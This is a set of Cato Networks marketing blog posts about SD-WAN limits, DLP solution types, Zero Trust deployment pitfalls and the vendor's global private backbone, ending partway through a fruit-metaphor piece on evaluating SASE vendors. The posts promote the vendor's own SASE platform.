Relying on SSE offerings or security services in the cloud won’t fully address the problem. Deployment is still a problem as there’s no automated traffic routing and tunnel creation between SD-WAN devices and cloud security PoPs. Security infrastructure is also unable to consume and share security policies (such as segmentation) between SD-WAN and cloud security vendors. Operationally, SD-WAN devices and cloud services remain distinct, making troubleshooting more challenging and depriving security teams of networking information that could be valuable in hunting for threats.
And in the end, reducing to two brains better than four, still leaves you with well, two brains on one network.
SD-WAN: It’s Not Dead Just Part of a Bigger Family
So, is SD-WAN dead? Hardly. It remains what it always was – an important tool for building the enterprise network. But like the crazy uncle who might great for laughs but not be terribly reliable, SD-WAN has limitations that need to be addressed.
What’s needed is an approach that uses SD-WAN to connect locations but addresses its security and deployment limitations. SASE secures and connects the complete enterprise – headquarters, branches in distant locations, users at home or on the road, and resources in the cloud, private datacenters, or on the Internet. With one network securing and connecting the complete enterprise, deployments become easier, visibility improves, and security becomes more consistent.
To make that happen, SASE calls for moving the bulk of security and networking processing into a global network of PoPs. SD-WAN devices connect locations to the nearest PoPs; VPNs clients or clientless access connect remote and mobile users. Native cloud connectivity within the PoPs connects IaaS and SaaS resources.
Cato is the World’s First and Most Robust Global SASE Platform
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global, cloud-native service. Cato optimizes and secures application access for all users and locations, including branch offices, mobile users, and cloud datacenters, and allows enterprises to manage all of them with a single management console with comprehensive network visibility. Cato’s SASE platform has all the advantages of cloud-native architectures, including infinite scalability, elasticity, global reach and low total cost of ownership.
Connecting locations to the Cato SASE Cloud is as simple as plugging in a preconfigured Cato Socket appliance, which connect to the nearest of Cato’s 70+ globally dispersed points of presence (PoPs). Mobile users connect to the same PoPs from any device by running the Cato Client. With Cato, new locations or users can be up and running in hours or even minutes, not days or weeks. Security capabilities include Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Firewall as a Service (FWaaS).
With Cato, customers can easily migrate from MPLS to SD-WAN, optimize global connectivity to on-premises and cloud applications, enable secure branch office Internet access everywhere, and seamlessly integrate cloud datacenters and mobile users into a high-speed network with a zero-trust architecture. So whether it's mergers and acquisitions, global expansion, rapid deployments, or cloud migration, with Cato, the network and your business are ready for whatever is next in your digital transformation journey.
The Information Revolution and The Growing Importance of Data We have all heard about the information revolution, but what does it actually mean and how...
Are You Protecting Your Most Valuable Asset with a Data Loss Prevention (DLP)? The Information Revolution and The Growing Importance of Data
We have all heard about the information revolution, but what does it actually mean and how profound is it? An interesting way to understand this is by looking at how it has impacted modern enterprises.
A company's assets can be divided into two types: tangible vs intangible. Simply put, tangible assets are those with a physical form factor (or which represents something physical). Intangible assets are those which do not really exist in the conventional sense, such as a company's Intellectual property. Research by Ocean Tomo1 covering the leading 500 companies in the US (S&P 500) shows that in 1975, intangible assets accounted for 13% of their total value. By 2015 it grew to 84% and by 2020 it reached 90%.
Figure 1: The value of intangible assets
Simply put, 90% of the value of a modern-era company comes from what it knows, only 10% from what it has. When looking at how these numbers shifted over the last 45 years, we can see how information has become the single most valuable asset for the modern enterprise.
Most enterprises, however, do not have the necessary means to effectively protect their data. Let's take a look at why this is, what protecting enterprise data means, and how to choose the right solution for your enterprise.
Protecting Your Company's Data With DLP
Information has critical value to an enterprise. It is, however, quite difficult to protect, especially considering a great part of it typically resides in the cloud. There are numerous tools aimed at restricting access to enterprise assets, but the most efficient solution to protect the movement of information to and from enterprise assets is Data Loss Prevention (DLP).
While DLP solutions have been around for 15 years, their adoption has been limited and mostly by high-end enterprises. The complexity, prohibitive costs and expertise required to obtain and effectively manage DLP solutions has left them beyond the reach of most enterprises.
The increasing value of information, the growing adoption of cloud computing, and continued rise in cybercrime, are driving enterprises to the realization that they need to do a better job protecting their data. The need for DLP is clear and imminent, and market interest is rising.
Gartner saw a 32% rise in DLP inquiries in 2020 vs the previous year2. But how can enterprises overcome the current adoption barriers and enable DPL protection for their assets? Let us start by looking at the types of DLP solutions and their respective advantages and shortcomings.
[boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/?utm_medium=blog_top_cta&utm_campaign=cato_dlp"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato's DLP | Whitepaper [/boxlink]
DLP isn't one thing
Gartner recognizes three types of DLP solutions2:
Enterprise DLP (EDLP)
Integral DLP (IDLP)
Cloud Service Provider Native DLP (CSP-Native DLP)
The above solutions all have their pros and cons, and the acquiring decision-makers need to decide which solution attributes are more important for their use-cases, and which can be compromised. Let us take a deeper look into each one.
Enterprise DLP (EDLP) - An enterprise level solution which covers all relevant traffic flows, and which is implemented as a stand-alone solution. EDLPs require adding (yet) another solution to an organization’s security toolbox. This typically requires an expansive project plan and additional expertise, adding complexity and cost to the project. While an EDLP offers a single console and policy management interface for the entire network, it is typically a separate console from the other network security tools (FW, IPS, AM, SWG, etc.). EDLPs will typically add another hop in the security service chain, and thus add latency and impact performance.
Figure 2: Enterprise DLP
Integrated DLP (IDLP) - DLP functionality that is added on top of a pre-existing security product such as a Secure Web Gateway (SWG). IDLPs simplify the deployment process and are regarded as a quick win to get DLP up and running quickly and at a reduced cost. IDLPs, however, are limited to the traffic and use cases the base product is intended for. Piggybacking on a SWG, for example, will cover only Internet-bound traffic and may not inspect IaaS traffic. Gaining wider coverage will require adding DLP to additional security products, which will lead to fragmented consoles and policy management.
Figure 3: Integrated DLP
CSP-Native DLP - A cloud-based DLP which is deployed in, or provided by, a cloud service provider (CSP). This type of solution is also simple to adopt as it is delivered as a Software as a Service (SaaS) and doesn't require deployment. It is, however, limited to the traffic sent to or from the specific CSP proving it. As most enterprises using cloud platforms are adopting a multi-cloud strategy, getting complete coverage will require using DLP services from several CSPs. Also, this type of solution will typically not cover all SaaS applications and is typically limited to sanctioned applications only.
Figure 4: CNP-Native DLP
Choosing The Right DLP For Your Enterprise
EDLPs typically offer better coverage and enhanced protection, however, the complexity and cost concerns drive security leaders to shy away and look for simpler and cheaper options. An IDLP offers this, but the limited coverage and disjointed consoles and policy management impact their effectiveness and level of protection. CSP-Native DLPs are also simpler to onboard but are cumbersome for multi-cloud deployments and do not cover the critical use-case of unsanctioned applications (AKA Shadow IT).
All the above DLP types come with compromises. Ideally, we would want a solution that is easy to deploy and manage, has complete coverage and optimal protection, does not impact performance, and covers unsanctioned applications.
The rise of SASE DLP
A true Secure Access Service Edge (SASE), or its Secure Service Edge (SSE) subset, offers the best of all worlds. Cato's SASE Cloud, for example, covers all fundamental SASE requirements:
All edges - Cato SASE Cloud covers all enterprise users, on-prem or remote, and all applications and services, on-prem, IaaS and SaaS. This means that Cato's SASE-based DLP will have complete coverage of all traffic and all use-cases.
Single pass processing - Cato SASE Cloud utilizes Cato's proprietary Singe-Pass Cloud Engine (SPACE), which is based on a modular software platform stack that executes the networking and network security services in parallel. This enables a shared context, enhancing overall protection, and minimizes latency. Adding DLP to a Cato deployment is done by a flip of a switch and requires no additional deployment.
Cloud-native - Cato DLP is delivered fully from the cloud and offers all the benefits of a cloud-native solution, including unlimited scalability and inherent high-availability. Since it is part of the Cato SASE Cloud, it is completely CSP-agnostic and supports all leading cloud service providers, making it a true multi-cloud solution.
Converged - Cato SASE runs and manages all services as a single solution, enabling configuration, management, and visibility from a single-pane-of-glass management console.
Figure 5: SASE/SSE DLP
The pros and cons of the different DLP solution types:
Figure 6: DLP types, pros and cons
The DLP that's in your reach
A true SASE solution enables enterprises to adopt a DLP solution that benefits from all the advantages mentioned above, and more. The reduced complexity and costs, lower the traditional barrier of adoption, enabling enterprises of all sizes and levels of expertise to better protect their data. It also eliminates the dilemma of what to compromise on when looking to adopt DLP within your environment. A SASE DLP requires no compromises. Protecting your enterprise's most valuable asset is just a flip of a switch away.
To learn more about Cato DLP, read our DLP whitepaper.
1 Harvard Business Review2 DLP market guide 2021 - Gartner
The Role of the CISO Post-Pandemic The world has evolved… Prior to recent global events, many organizations viewed digital transformation as a slow-moving journey that...
A CISO’s Guide: Avoiding the Common Pitfalls of Zero Trust Deployments The Role of the CISO Post-Pandemic
The world has evolved... Prior to recent global events, many organizations viewed digital transformation as a slow-moving journey that would be achieved gradually over time. However, Covid turned this completely on its ear, forcing most organizations to accelerate that journey from 2-3 years down to 2-3 months, and doing so without a well-thought-out strategy. Couple this with the rapid rise of Work-From-Anywhere (WFA) and CISOs have realized their traditional security architectures, specifically VPNs, are no longer adequate to ensure only authorized users have access to critical resources.
Collectively, this has made the role of CISO ever more important because, as a result of this accelerated journey, we now have applications everywhere, people everywhere, leading to increased cyber threats everywhere. The role of CISO has one core imperative: mapping out the company’s security priorities and strategy, then executing this flawlessly to ensure the strongest possible security posture to protect access to critical data.
Zero Trust Is Just a Starting Point
This is why Zero Trust has now become top-of-mind for all CISOs. The concept of Zero Trust has been around for more than a decade since first being introduced. Zero Trust mandates that all edges, internal or external, cloud, branch or data center, to be authenticated, authorized and validated before granting or maintaining access to critical data. In short, Zero Trust is a framework for building holistic security for the modern digital infrastructure and associated data. Considering cyber threats continue to rapidly expand, and chasing down data breeches have become a daily activity, Zero Trust is uniquely equipped to address the modern digital business architecture: WFA workers, supply chains, hybrid cloud, and evolving threats.
It must be noted that Zero Trust is not a single product solution, and CISOs would be well advised to consult the three main standards (Forrester ZTX, Gartner Carta, NIST SP-800-207) as guidance for developing their Zero Trust strategy. Of the three, to date, NIST SP-800-207 as pictured below, is the most widely adopted framework.
In general, the NIST model is a discussion of 2 key functions:
Data plane – this is the collector of data from numerous sources. These sources can be application data, user device information, user identity information, etc.
Control plane – this is the brains of the model as this is responsible for making decisions upon what is considered good, bad, or requiring further clarification.
Together, the control plane and data plane collaborate to determine whether a user should be granted access permissions at any point in time to the resource for which they are requesting. Critical for this to be viable, effective, and scalable, is the context that informs decisions to be made around access and security. As each business varies in its data flows and security concerns, this context consists of data feeds, as depicted in figure 1, that includes compliance data, log data, threat intelligence feeds and user and application data, as well as other data sources captured across the network. The more context you have, the better decisions your Zero Trust deployment will make.
The 5 Most Common Pitfalls in Zero Trust Projects
The concept of Zero Trust is often misunderstood, potentially resulting in misaligned strategies that don’t meet the organization’s needs. Gartner defines Zero Trust as a ‘mindset that defines key security objectives’ while removing implicit trust in IT architectures. This implies that today’s CISOs would be well-advised to pursue their Zero Trust strategy thoughtfully, to ensure they avoid common pitfalls that impede most security initiatives.
Pitfall 1: Failing to Apply the Key Tenants of Zero Trust
Zero Trust came to life as a resolution for overly permissive access rights that created broad security risks throughout networks. The concept of implicit deny is perceived as the catch all terminology for a better security architecture, assuming it to be the fix-all for all things security. Considering this, it may be easy for CISOs to inadvertently disregard the core purpose of Zero Trust and overlook some key architectural tenants that influence Zero Trust architectures.
While each of the Zero Trust frameworks call out a number of architectural attributes of Zero Trust, for the purpose of this section, we will highlight a few that we feel should not be overlooked.
Dynamic policy determines access to resources – dynamic polices focus on the behavioral characteristics of both the user and devices when determining whether access will be granted or denied. A subset of these characteristics can include location, device posture, data analytics and usage patterns. For example, is the user in a restricted location, or are user and device credentials being used correctly? Any of these should determine whether access should be granted and at what level.
Continuous monitoring and evaluation – no user or device should blindly be trusted for access to network or application resources. Zero Trust dictates that the state of both the resource and the entity requesting access to be continually monitored and evaluated. Those deemed to be risky should be treated accordingly, whether it is limited access or no access.
Segmentation & Least Privileges – Zero Trust should eliminate blind trust and by extension, blanket access to targeted resources from all employees, contractors, supply chain partners, etc. and from all locations. And when access is granted, only the minimal amount of access required to ensure productivity should be granted. This ensures the damage is limited should there be a breach of some kind.
Context Automation – For Zero Trust to deliver the desired impact, organizations need to collect lot of data and contextualize this. This context is the key as without context, well-informed decisions for user or device access cannot be made. The more context, the better the decisions being made.
Cato SASE Cloud Approach: The Cato SASE Cloud takes a risk-based approach to Zero Trust, combining Client Connectivity & Device Posture capabilities with more holistic threat preventions techniques. Because we have full visibility of all data flows across the network, we utilize this, as well as threat intelligence feeds and user and device behavioral attributes to pre-assess all users and devices prior granting access onto the network. This in-depth level of context allows us to determine their client connectivity criteria and device suitability for network access, as well as continually monitor and assess both the user and device throughout their life on the network. Additionally, we use AI & Machine Learning algorithms to continually mine the network for indications of malware or other advanced threats and will proactively block these threats to minimize the potential damage inflicted upon the network.
[boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | EBOOK [/boxlink]
Pitfall 2: Treating Zero Trust a Like a Traditional VPN
When deploying Zero Trust, many organizations tend to rely on legacy security processes that are no longer applicable or select the shiny new toy that equates to a less viable solution. In 2021, Gartner noted that some organizations reported initially configuring their Zero Trust deployments to grant full access to all applications, which ironically, mirrored their VPN configuration. One of the intrinsic shortcomings of traditional VPNs, beyond the connectivity issue, is the challenge of least privilege user access to critical applications once a user has been authenticated to the network. Traditional VPNs cannot provide partial or specific access to selected applications or resources. So, deploying Zero Trust like their old VPN leaves us to wonder what problems they are truly solving, if any.
CISOs must remember that existing security architectures are based on the concept of implicit trust, which leads to unknown, yet ever-increasing risk to modern enterprise environments. The ultimate goal of Zero Trust is to ensure that users and their devices prove they can be trusted with access to critical resources. Hence, the ultimate goal for any CISO in creating a Zero Trust strategy is to reduce the risk posed by users and devices, and in the event of a successful breach, limit the spread and impact of the attack.
Cato SASE Cloud Approach: Cato Networks realizes that existing VPN architectures are too inadequate to provide the depth of access protections for critical enterprise resources. The Cato approach to Zero Trust invokes consistent policy enforcement everywhere to ensures least privilege access to all enterprise & cloud resources, while also taking a holistic approach to preventing cyber threats. We consume terabytes of data across our entire SASE Cloud backbone, and this informs how we apply additional protections once users and devices are on the network.
Pitfall 3: Not understanding the true impact on the user, IT and Security
Unfortunately for many CISOs, IT and Security departments do not always operate with aligned priorities and desired outcomes. IT departments may have critical projects they deem to have a higher priority than Security. Security teams, being tasked with strengthening the organization’s security posture may view Zero Trust as the only priority. In such cases of mis-aligned priorities, Zero Trust efforts may result in incomplete or mis-configured deployments, expanding security gaps and increasing blind spots. And let’s not forget the end user. When IT organizations finally makes significant changes to networks, security, or other systems, if priorities aren’t aligned, the end results will produce adverse user outcomes.
When it comes to Zero Trust, CISOs must ensure they are mapping out the journey. In doing so, IT and Security teams should establish a “Hippocratic Oath” of “first, do no harm”, similar to that of the medical community. This could make it easier to map the journey to Zero Trust where the solution is simple to deploy, easy to manage, easily scales at the speed of the business, and provides positive outcomes for all parties impacted. Critical to this is the user – Zero Trust must not impede their ability to get things done.
Cato SASE Cloud Approach: At Cato Networks, our entire approach to Zero Trust is to ensure the most holistic user experience with zero impact on productivity. Often when deploying or upgrading to new security technologies, security teams will inadvertently have policy mis-matches that result in inconsistent policy enforcement in certain segments of the network. Zero Trust, if not implemented correctly, increases the risk level for negative user experiences, which will reflect poorly upon the CISO and their teams. With the Cato SASE Cloud, Zero Trust & Client Access policies are applied once and enforced everywhere. This ensures specific and consistent policy treatment for all users and devices based upon identity and user and devices access criteria.
"The hallmark of Zero Trust is Simplicity"
Pitfall 4: Inadequately Scoping Common Use Cases
CISOs are so inundated with everyday security concerns that identifying all possible use cases for their Zero Trust initiative, while seemingly straight-forward, could be easily overlooked. It is easy to drill down into the core requirements of Zero Trust, approaching from a broad enterprise perspective, yet neglect smaller details that might derail their project. While there are numerous use cases and each would depend on the individual organization, this document calls out (3) use cases that, if not properly planned for, will impact all non-HQ based or non-company users.
Multi-branch facilities – It is common that today’s enterprises will comprise of a single headquarter with multiple global locations. More commonly, these global locations exist in a shared space arrangement whereby the physical network and connectivity is independent of the company. In such cases, these employees still require access to enterprise applications or other resources at the HQ or company data center. In other cases, a user may be a road warrior, using unmanaged personal devices, or be located in restricted locations. Given this, great care and consideration must be given in determining if, when and how to grant access to necessary resources while denying access or restricting actions to more sensitive resources.
Multi-cloud environments – More enterprises are utilizing multi-cloud providers to host their applications and data. There are occasions whereby the application and data source exist in different clouds. Ideally, these cloud environments should connect directly to each other to ensure the best performance.
Contractors and 3rd party partners – Contractors and 3rd party supply chain partners requiring access to your network and enterprise resources is very common these days. Often these entities will use unmanaged devices and/or connect from untrusted locations. Access can be granted on a limited basis, allowing these users and devices only to non-critical services.
CISOs must factor in these and other company specific use cases to ensure their Zero Trust project does not inadvertently alienate important non-company individuals.
Cato SASE Cloud Approach: At Cato Networks, we acknowledge that use cases are customer, industry, and sometimes, location dependent. And when Zero Trust is introduced, the risk of inadvertently neglecting one or more critical use cases is magnified. For this reason, we built our architecture to accommodate, not only the most common use cases, but also obscure and evolving use cases as well. The combination of our converged architecture, global private backbone, single policy management, and virtual cloud sockets ensure we provide customers with the most accommodating, yet most robust and complete Zero Trust platform possible.
Pitfall 5: Not having realistic ROI expectations
ROI, for many IT-related initiatives is rather difficult to measure, and many CISOs often find themselves twisted on how to demonstrate this to ensure company-wide acceptance. Three questions around ROI that are traditionally difficult to answer are:
What should we expect?
When should we expect it?
How would we know?
Like many things technology-related, CISOs are hesitant to link security investments to financial metrics. However, delaying a Zero Trust deployment can yield increased costs, or negative ROI over time that can be measured in increased data breaches, persistent security blind spots, inappropriate access to critical resources, and misuse of user and resource privileges, just to name a few.
CISOs can address these ROI concerns through a number of strategies that extend beyond simple acquisition costs and into the broader operational costs. With the right strategy and solution approach, a CISO can uncover the broader strategic benefits of Zero Trust on financial performance to realize it as an ROI-enabler.
Cato SASE Cloud Approach: It is easy to appreciate the challenge of achieving ROI from Security projects. As mentioned, CISOs like CIOs are hesitant to link security investments to financial metrics. However, with an appropriate Zero Trust strategy, organizations will assure themselves enormous savings in IT effort and vendor support. Organizations deploying a Zero Trust solution based off a converged, cloud-native, global backboned SASE Cloud like Cato can expect more efficient cost structures while achieving greater performance. By converging critical security functions, including Zero Trust, into a single software stack within the Cato SASE Cloud, organizations are able to immediately retire expensive, non-scalable, maintenance-intensive VPN equipment. This approach delivers ease of deployment and simplistic management, while drastically reducing maintenance overhead and IT support costs.
Achieving Your Organization’s Zero Trust Goals with Cato SASE Cloud
Justifying a security transformation from implicit trust to Zero Trust is becoming easier and easier. However, determining the right approach to achieving an organization’s Zero Trust goals can be daunting. It is challenging when factoring in the broad paradigm shift in how we view user and device access, as well as numerous use case considerations with unique characteristics. Zero Trust Network Access is an identity-driven default-deny approach to security that greatly improves your security posture. Even if a malicious user compromises a network asset, ZTNA can limit the potential damage. Furthermore, the Cato SASE Cloud’s security services can establish an immediate baseline of normal network behavior, which enables a more proactive approach to network security in general and threat detection in particular. With a solid baseline, malicious behavior is easier to detect, contain, and prevent.
"The Zero Trust is a security model based on the principle of maintaining strict access controls and not trusting anyone by default; a holistic approach to network security, that incorporates a number of different principles and technologies.”
The Cato SASE Cloud was designed for the modern digital enterprise. Our cloud-native architecture converges security features such as Zero Trust Network Access (ZTNA), SWG, NGFW, IPS, CASB, and DLP, as well as networking services such as SD-WAN and WAN Optimization across a global private backbone with a 99.999% uptime SLA. As a result, Cato is the only vendor currently capable of delivering seamless ZTNA on a true SASE platform for optimized performance, security, and scalability.
Zero Trust is a small part of SASE. The Cato SASE Cloud restricts access of all edges – site, mobile users and devices, and cloud resources – in accordance with Zero Trust principles. Click here to understand more about Cato Networks’ approach to Zero Trust.
It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or...
Not All Backbones are Created Equal It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or affordable) for the modern digital business. In other cases, it might be a global SD-WAN deployment, which relied too much on the unpredictable Internet.
Regardless of why the company needs to transform its enterprise network, the challenge remains the same: How do you get secure connections with the same service level of predictability and consistency as MPLS at an Internet-like price point? This calls for a SASE service built on a global private backbone.
Why a Global SASE Service?
Even enterprises who previously thought of themselves as regional operations find they need global reach today. Why? Because users and data are everywhere. They can (and probably do) sit in homes (or cafés) far from any place an office might be situated, accessing cloud apps across the globe. Pulling traffic back to some site for security inspection and enforcement adds latency, killing the application experience. Far better is to put security inspection wherever users and data sit. This way they receive the best possible experience no matter where that executive might be sitting in the world.
Once inspected, moving traffic to a private datacenter or other sites across the global Internet is asking for trouble. The Internet might be fine as an access layer, but it’s just too unpredictable as a backbone. One moment a path might be direct and simple; the next your traffic could be sent for a 40-stop visit the wrong way around the globe. With a private backbone, optimized routing and engineering for zero packet loss makes latency far lower and more predictable than across the global Internet.
Why Not Private Networks from Hyperscalers?
All major public cloud providers – AWS, Azure, and GCP -- realize the benefits of global private networks and offer backbone services today. So why not rely on them? Because while a hyperscaler backbone might be able to connect SD-WAN devices, it lacks the coverage to bring security inspection close to the users across the globe. Only a fraction of the many hyperscaler PoPs can run the necessary security inspections and only a smaller fraction can act as SD-WAN on-ramps. At last check, for example, only 39 of Azure's 65 PoPs supported Azure Virtual WAN. And then there's the question of availability. The uptime SLAs offered by cloud providers are too limited, only running 99.95% uptime, while traditional telco service availability typically runs at four nines, 99.99% uptime.
[boxlink link="https://www.catonetworks.com/resources/global-backbone-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=global_backbone_demo"] Global Backbone | Watch Cato Demo [/boxlink]
Why Cato’s Global Private Backbone?
For those reasons and more, enterprises are replacing their legacy network with Cato’s global private backbone. Today, it’s the largest private SASE network spanning 70+ PoPs worldwide.
Built as a cloud-native network with a global private backbone, Cato SASE Cloud has revolutionized global connectivity. Using software, commodity hardware, and excess capacity within global carrier backbones, we provide affordable SLA-backed connectivity at global scale.
And every one of our PoPs runs the Cato Single Pass Cloud Engine (SPACE), the converged software stack that optimizes and secures all traffic according to customer policy.
Our simple edge devices combine last mile transports, such as fiber, cable, xDSL, and 4G/5G/LTE. Encrypted tunnels across these last-mile transport carry traffic to nearest PoP. The same goes for our mobile clients (and clientless access). From the PoP, traffic is routed globally to the PoP closest to the destination using tier-1 and SLA-backed global carriers.
This model extends to cloud services as well. Traffic to cloud applications or cloud data centers exit at the PoP closest to these services, and in many cases within the same data center hosting both PoP and cloud service instance.
Key Benefit #1 – Optimized Performance
With built-in WAN optimization, Cato increases data throughput by as much as 40x. Advanced TCP congestion control enables Cato edges to send and receive more data, as well as better utilize available bandwidth. Other specific optimization improvements include:
Real-time network condition tracking to optimize packet routing between PoPs. We don’t rely on inaccurate metrics like BGP hops, but rather on network latency, packet loss, and jitter in the specific route.
Controlling the routing and achieving MPLS-like consistency and predictability anywhere in the world. For example, the path from Singapore to New York may work better through Frankfurt than going direct, and Cato SASE Cloud adapts to the best route in real time.
Applying dynamic path selection both at the edge and at the core – creating end-to-end optimization.
Accelerating bandwidth intensive operations like file upload and download through TCP window manipulation.
Key Benefit #2 – Self-Healing and Resiliency
To ensure maximum availability, Cato SASE Cloud delivers a fully self-healing architecture. Each PoP has multiple compute nodes each with multiple processing cores. Each core runs a copy of Cato SPACE, which manages all aspects of failure detection. Failover and fail back are automated, eliminating the need for dedicated planning or pre-orchestration. More specifically, resiliency capabilities include:
Automatically working around backbone providers in case of outage or degradation to ensure service availability.
Ensuring that if a compute node fails, tunnels seamlessly move to another compute node in the same PoP or to another nearby PoP. And in the unlikely event that a tier-1 provider fails or degrades, PoPs automatically switch to one of the alternate tier-1 providers.
Specialized support for challenging locations like China. Cato PoPs are connected by private and encrypted links through a government-approved provider to Cato's Hong Kong PoP.
A great example of Cato resiliency at work was the recent Interxion datacenter outage in London housing Cato’s London PoP. The outage disrupted trading on the London Metal Exchange for nearly five hours. And for Cato? A few seconds. Read this first-hand account from Cato’s vice president of operations, Aviram Katzenstein.
Key Benefit #3 – Secure and Protected
Cato’s global private backbone has all security services deployed in each of the Cato PoPs. This means that wherever you connect from, your traffic is protected by a full security stack at the PoP nearest to you. From there, Cato’s backbone carries your traffic directly to its destination, wherever it may be. This enables full security for all endpoints without any backhauling or additional stops along the way.
Extensive measures are taken to ensure the security of Cato SASE Cloud. All communications – between PoPs, with Cato Sockets, or Cato Clients – are secured by AES-256 encrypted tunnels. To minimize the attack surface, only authorized sites and remote users can connect and send traffic to the backbone. The external IP addresses of the PoPs are protected with specific anti-DDoS measures. Our service is ISO 27001 certified.
Key Benefit #4 – Internet-like Costs
We reduce the cost of enterprise-grade global connectivity by leveraging the massive build-out in IP capacity. All Cato PoPs are connected by SLA-backed transit capacity across multiple tier-1 networks. The Cato software monitors the underlying, capacity selecting the optimum path for every packet. The result: a network with far better performance than the public Internet at a far lower cost than global MPLS.
A Proven Solution for Global Connectivity
Cato’s backbone delivers better performance, availability, and coverage than any single carrier. A single tier-1 carrier can’t reach all parts of the globe, and a single tier-1 carrier can’t provide the predictability of MPLS. Just as enterprises use SD-WAN to aggregate Internet services and overcome the limitations of any one service, SASE leverages SD-WAN to aggregate tier-1 carriers to overcome the limitations of any one network.
“Opening new stores now goes smoothly, pricing is affordable, the cloud firewall and private backbone provide a great experience, and services are easy to set up.”
Steve Waibel, Director of IT, Brake Masters
“We no longer had to have a separate IDS/IPS, on-premises firewalls, or five different tools to report on each of those services. We could bring our cloud-based services directly into Cato’s backbone with our existing sites and treat them all the same.”
Joel Jacobson, Global WAN Manager, Vitesco Technologies
“The fast backbone connection most of the way to its ACD cloud service was a big plus. QOS was always a struggle before Cato. It’s pretty awesome to hit that Cato network and see that traffic prioritized all the way through to the cloud, rather than just close to our site.”
Bill Wiser, Vice President of IT, Focus Services
Thanks to the low cost of the Cato solution, Boyd CAT more than doubled branch bandwidth, by moving from 10 to 25 Mbits/s - to dramatically improve application performance together with Cato's optimization and global private backbone.
“The branches were just loving it. They started fighting over who would transition to Cato next. We were able to discontinue all our MPLS connections.”
Matt Bays, Communications Analyst, Boyd CAT
With Cato SASE, office and remote and home workers connect to the same high-speed backbone. Mobile and home users benefit from the same network optimizations and security inspections as office workers.
“This year, the entire WAN and Internet connectivity will be running on Cato.”
Eiichi Kobasako, Chief of Integrated Systems, Lion Corporation
There is a common cliché that is often thrown around during SASE vendor discussions “you are comparing apples to oranges.” This phrase is typically used...
Evaluating SASE Vendors? Here’s Why You Should Compare Apples and Oranges There is a common cliché that is often thrown around during SASE vendor discussions “you are comparing apples to oranges.” This phrase is typically used when looking at functions or features of a product, but often is used by people looking to discredit a solution offered by a competitor. It is natural, however, as every single vendor is inherently biased to believe that their offering is the best. So, let us take a look at what this expression means, and why we should compare apples and oranges when evaluating SASE solutions.
Why Compare Apples and Oranges
An apple and an orange have many things in common. They are both fruits, they are both round, they both can taste sweet (or sour), and both can do damage if they are thrown in anger. Based on these characteristics alone, there is no discernible difference between the two.
Now, what are the differences? The question you need to ask yourself is, “What do I want?” If you are looking to make an apple pie, then the choice is obvious. However, if your goal is to just eat something fruity, then that is where the deliberation begins. Do you buy an apple? Do you buy an orange? If you do not have an idea in mind, it is easy to get overwhelmed in the fruit aisle…
Mapping Architecture to Your End Goal
Look at the solutions and technologies that you use today within your corporate network and think about the purpose of their design. Have you purchased an orange or an apple, or do you have a chaotic digital fruit-salad which has grown organically over time due to a myriad of tastes and preferences? If so, you need to re-evaluate your entire corporate strategy to help you grow and develop into the future.
The architecture of every fruit has a purpose and has been designed in an optimal way to ensure continuity of their lineage. The orange has segments which may hold individual seeds, while grapes grow in a bunch connected by the stalks. This his could be compared to a microservice architecture, such as Docker (packing containerized applications on a single node) or Kubernetes (running containerized applications across a cluster). Each fruit has its pros, cons, and uses, however the more fruit you want, the more difficult your life becomes. You need to understand the architecture of each fruit, and then go on to identify the best-practice for fruit combinations. You need to know the purpose and intent of each piece of fruit, and you need to locate a myriad of different fruits. This is manageable if there’s only one person purchasing and eating fruit for the company, but as soon as you add another personality – the situation evolves, in a negative way, and we haven’t even thought of the fruit bowl challenge.
[boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfp_template"] SASE RFI/RFP Made Easy | Get the Template [/boxlink]
The Fruit Bowl Challenge
Every time you purchase a piece of fruit, you need to store it somewhere. This could be in the fridge, in a bowl, in a cupboard, or left in your car under the scorching sun. To purchase each piece of fruit, you may need to go to different shops, with varying levels of quality. Should you purchase a Jazz Apple or a Braeburn, a Clementine or a Satsuma? Once you’ve identified which specific type of fruit you want, where can you get it at the right price? Shop A may offer it at a lower price than Shop B today, but that’s a limited time offer. When you’re trying to maximise a constrained budget, the time investment required to ensure you purchase something of quality and longevity can be a moderately significant effort.
Now, consider each piece of fruit is a component of your network. You want to purchase edge security, so you gather several vendors to check for bruises, blemishes, and pack-size. After making your decision on what to buy (after months of deliberation, RFPs, and proof-of-concepts), you then move to the negotiation stage with hundreds of distributors, resellers, or VARs. Finally, you close on the deal, and they send you a truck full of apples. It’s what you wanted right? I hope you have somewhere to store all those apples, because the clock is ticking, and they’re already starting to spoil.
Turning Apples into Apple Pie
So, you have your apples, you can see them, and you proudly gaze upon the mountain of fruit sat in your warehouse. You’ve spent a lot of money on these apples, and you’ve cashed in all your favours with your CFO to get the budget approved for this gargantuan upfront cost. Now the real work begins, as you need to prepare for the implementation, deployment, and creation of your apple pies (or firewall/site deployments, I’m sticking to the metaphor here!)
The first thing you do is hire a group of people to move the apples into neat piles. Then you hire another group of people to come and peel the apples, as well as a disposal company to remove the packaging/peel that you no longer need. Once fully peeled and sliced, you then need a way to transport the prepared goods to the next location for processing – all of this is required even before your apples touch pastry. However, you accounted for this during your initial budget spend, and do not see it as a concern, until you notice that some of the fruit has already turned rotten. You need to contact the vendor to initiate a return (RMA), and this is where you notice problems.
The Rotten Apple Problem
“Your support contract on this apple has expired.”
I personally used to work for an appliance (fruit) based company, and I had to tell customers this on an almost daily basis. People call Support for assistance as their sites may be down, or critical applications have been impacted by service outages and they need urgent P1 Support. However, if the customer had not actively maintained their Support contracts, then there is no legal obligation to assist resolve their problem. In fact, if the vendor operates on a ‘Support & Maintenance per device’ basis, it’s within their interest to actively withhold assistance until you pay the money to reinstate the contract.
